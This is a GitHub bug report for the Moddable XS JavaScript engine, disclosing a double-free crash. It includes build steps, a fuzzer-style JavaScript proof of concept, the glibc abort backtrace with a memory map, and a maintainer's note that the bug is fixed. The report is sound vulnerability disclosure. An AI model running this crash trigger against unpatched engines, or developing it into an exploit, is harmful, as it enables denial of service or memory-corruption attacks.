Moddable-OpenSource/moddable #375: double free

rain6851, 2020-06-02:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function main() {
    let v2 = 0;
    var Semm = new SharedArrayBuffer(null);
    var adte = new Boolean();
    do {
        const v5 = [
            13.37,
            13.37,
            13.37,
            13.37,
            13.37
        ];
        const v6 = [];
        let v7 = v6;
        function v8(v9, v10) {
            function v11(v12, v13) {
                let v15 = arguments;
                return v15;
            }
            const v16 = v11();
            const v18 = [
                13.37,
                13.37,
                13.37,
                13.37,
                13.37
            ];
            const v20 = 1919903432 === 1919903432;
            const v21 = [v20];
            var AMrP = DataView;
            const v24 = 1919903432 << 6;
            var EWch = Date;
            const v25 = v21.indexOf(v24, 0, 6, v24, v24);
            const v28 = new Uint32Array(11105);
            var rhbY = v8(null, null, null, null, null);
            var fJwj = main();
            var TMJa = Reflect;
            var GfCt = v8(v28['448'], v6, v6, v28[''], v28['']);
            var RdYi = JSON.stringify('(,#');
            var jcrn = main();
            var SBcE = Reflect;
            const v29 = v16[1337];
            for (const v30 of v28) {
            }
        }
        const v31 = [];
        let v32 = v31;
        const v33 = v8(...v32, v7, v5, 10, 13.37);
        const v34 = v2 + 1;
        v32.length = v34;
    } while (v2 < 10);
}
main();
```
# vulnerability analysis
The program has double free, the following is the abnormal information.

````
Error: v11: stack overflow
*** Error in `../build/bin/lin/debug/xst': double free or corruption (out): 0x0000000001c91610 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fd396fa17e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fd396faa37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fd396fae53c]
../build/bin/lin/debug/xst(fxFree+0x2c4)[0x606864]
../build/bin/lin/debug/xst(fxDeleteMachine+0x199c)[0x438b2c]
../build/bin/lin/debug/xst(main+0x1163)[0x423283]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fd396f4a830]
../build/bin/lin/debug/xst(_start+0x29)[0x425b49]
======= Memory map: ========
00400000-00812000 r-xp 00000000 08:01 997815                             /home/node/mmfuzzer/moddable/build/bin/lin/debug/xst
00a11000-00a12000 r--p 00411000 08:01 997815                             /home/node/mmfuzzer/moddable/build/bin/lin/debug/xst
00a12000-00a13000 rw-p 00412000 08:01 997815                             /home/node/mmfuzzer/moddable/build/bin/lin/debug/xst
01c91000-01cea000 rw-p 00000000 00:00 0                                  [heap]
7fd38c000000-7fd38c021000 rw-p 00000000 00:00 0 
7fd38c021000-7fd390000000 ---p 00000000 00:00 0 
7fd392b01000-7fd392b17000 r-xp 00000000 08:01 1315952                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fd392b17000-7fd392d16000 ---p 00016000 08:01 1315952                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fd392d16000-7fd392d17000 rw-p 00015000 08:01 1315952                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fd392d17000-7fd392d22000 r-xp 00000000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fd392d22000-7fd392f21000 ---p 0000b000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fd392f21000-7fd392f22000 r--p 0000a000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fd392f22000-7fd392f23000 rw-p 0000b000 08:01 1332234                    /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fd392f23000-7fd396f2a000 rw-p 00000000 00:00 0 
7fd396f2a000-7fd3970ea000 r-xp 00000000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7fd3970ea000-7fd3972ea000 ---p 001c0000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7fd3972ea000-7fd3972ee000 r--p 001c0000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7fd3972ee000-7fd3972f0000 rw-p 001c4000 08:01 1332237                    /lib/x86_64-linux-gnu/libc-2.23.so
7fd3972f0000-7fd3972f4000 rw-p 00000000 00:00 0 
7fd3972f4000-7fd39730c000 r-xp 00000000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fd39730c000-7fd39750b000 ---p 00018000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fd39750b000-7fd39750c000 r--p 00017000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fd39750c000-7fd39750d000 rw-p 00018000 08:01 1332224                    /lib/x86_64-linux-gnu/libpthread-2.23.so
7fd39750d000-7fd397511000 rw-p 00000000 00:00 0 
7fd397511000-7fd397619000 r-xp 00000000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7fd397619000-7fd397818000 ---p 00108000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7fd397818000-7fd397819000 r--p 00107000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7fd397819000-7fd39781a000 rw-p 00108000 08:01 1332247                    /lib/x86_64-linux-gnu/libm-2.23.so
7fd39781a000-7fd397840000 r-xp 00000000 08:01 1332223                    /lib/x86_64-linux-gnu/ld-2.23.so
7fd397a0e000-7fd397a12000 rw-p 00000000 00:00 0 
7fd397a3e000-7fd397a3f000 rw-p 00000000 00:00 0 
7fd397a3f000-7fd397a40000 r--p 00025000 08:01 1332223                    /lib/x86_64-linux-gnu/ld-2.23.so
7fd397a40000-7fd397a41000 rw-p 00026000 08:01 1332223                    /lib/x86_64-linux-gnu/ld-2.23.so
7fd397a41000-7fd397a42000 rw-p 00000000 00:00 0 
7ffedde79000-7ffedde9a000 rw-p 00000000 00:00 0                          [stack]
7ffeddf92000-7ffeddf94000 r--p 00000000 00:00 0                          [vvar]
7ffeddf94000-7ffeddf96000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Aborted (core dumped)

````

rain6851, 2020-06-02:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-08-04:
Fixed. Related to #376.

closed 2020-08-04 by phoddie